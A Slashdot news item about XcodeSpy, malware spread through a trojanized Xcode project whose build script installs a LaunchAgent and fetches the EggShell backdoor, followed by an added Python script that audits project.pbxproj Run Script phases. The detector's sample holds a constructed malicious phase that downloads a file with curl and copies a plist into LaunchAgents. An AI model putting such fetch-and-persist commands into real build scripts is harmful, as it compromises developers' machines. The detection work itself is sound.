March 18, 2021 08:05 pm

iOS Developers Targeted With New XcodeSpy macOS Malware

Security researchers have uncovered a new type of macOS malware that has been used in the wild to attack iOS software developers through trojanized Xcode projects. From a report: Named XcodeSpy, the malware consists of a malicious Run Script that was added to a legitimate Xcode project named TabBarInteraction. Security firm SentinelOne, which analyzed the malware in a report published today and shared with The Record, said the malicious script ran every time the Xcode project was built, installing a LaunchAgent for reboot persistence and then downloading a second payload, a macOS backdoor named EggShell. "The backdoor has functionality for recording the victim's microphone, camera and keyboard, as well as the ability to upload and download files," said Phil Stokes, macOS malware researcher at SentinelOne. While the XcodeSpy server infrastructure that controlled the LaunchAgent was down, Stokes said they were able to discover several instances of the EggShell backdoor uploaded on the VirusTotal web-based malware scanner. Stokes said SentinelOne first learned of this malware following a tip from an anonymous researcher, who found an instance of the EggShell backdoor on the network of a US-based company. "The victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities," Stokes said, but the researcher told The Record they were not able to definitively link the malware to a nation-state operation beyond a reasonable doubt.

Read more of this story at Slashdot.


Original Link: http://rss.slashdot.org/~r/Slashdot/slashdot/~3/-dNxnkuhU6Y/ios-developers-targeted-with-new-xcodespy-macos-malware
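The report describes a malicious Run Script build phase that executes on every build and installs a LaunchAgent. As an added example (not from the SentinelOne report or Slashdot), the following audits a cloned project's `project.pbxproj` for Run Script phases before it is built; the indicator patterns and the embedded sample are assumptions constructed for illustration.

```python
import re, sys
from pathlib import Path

# shellScript value of a PBXShellScriptBuildPhase entry in project.pbxproj
# (old-style plist: a double-quoted string using backslash escapes).
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)

# Heuristic indicators: assumptions for triage, not IoCs from the report.
INDICATORS = {
    "network fetch": re.compile(r"\b(curl|wget)\b|/dev/tcp/"),
    "persistence": re.compile(r"LaunchAgents|LaunchDaemons|launchctl"),
    "encoded/eval": re.compile(r"base64|\beval\b|\bxxd\b"),
}

# Constructed sample: one benign lint phase, one phase worth a manual review.
SAMPLE = r'''
/* Begin PBXShellScriptBuildPhase section */
    A1 /* Lint */ = {
        isa = PBXShellScriptBuildPhase;
        shellPath = /bin/sh;
        shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
    };
    A2 /* Run Script */ = {
        isa = PBXShellScriptBuildPhase;
        shellPath = /bin/sh;
        shellScript = "curl -s https://example.invalid/x -o \"$TMPDIR/x\"\ncp x.plist ~/Library/LaunchAgents/\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

def unescape(value):
    """Decode plist string escapes (\\n, \\t, \\", \\\\) in one pass."""
    table = {"n": "\n", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(1)), value, flags=re.S)

def audit(pbxproj_text):
    """Return (script, [indicator names]) for every Run Script build phase."""
    findings = []
    for m in SHELL_SCRIPT_RE.finditer(pbxproj_text):
        script = unescape(m.group(1))
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        findings.append((script, hits))
    return findings

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for proj in Path(root).rglob("project.pbxproj"):
        for script, hits in audit(proj.read_text(errors="replace")):
            print(f"{proj}: {hits or 'no indicators'}: {script[:80]!r}")
```

Every Run Script phase is listed, flagged or not, because an empty indicator list only means the heuristics did not match; the script body still needs to be read before the first build.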
